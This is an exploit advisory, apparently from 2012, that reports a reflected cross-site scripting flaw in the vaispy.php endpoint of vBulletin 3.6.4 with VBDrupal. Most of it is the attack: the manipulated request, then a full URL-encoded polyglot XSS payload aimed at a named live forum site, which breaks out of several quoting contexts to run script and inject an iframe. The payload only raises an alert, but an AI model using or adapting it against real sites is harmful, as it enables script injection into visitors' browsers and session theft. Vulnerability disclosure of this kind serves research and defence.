# Exploit Title: VBDrupal Cross Site Scripting
# Date: 6.01.2012
# Author: Sony
# Software Link: http://drupal.org/download
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/01/vbdrupal-cross-site-scripting.html
..................................................................

I found this only in the http://forums.techarena.in. This is Vbulletin
3.6.4 with VBDrupal.

We can see xss in the /vaispy.php?do=

I replace xml with php.

GET
/vaispy.php?do=xml&last=5538926&r=0.73766774241121&forumids=&noChildren=0&_=

/vaispy.php?do=xml = /vaispy.php?do=php

Resultat:


http://forums.techarena.in/vaispy.php?do=php&last=5538926&r=0.73766774241121&forumids=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%3Ciframe%20width=%22560%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/FK9D6DfRtgk%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E

Greetz : AltaiR from hackzona.ru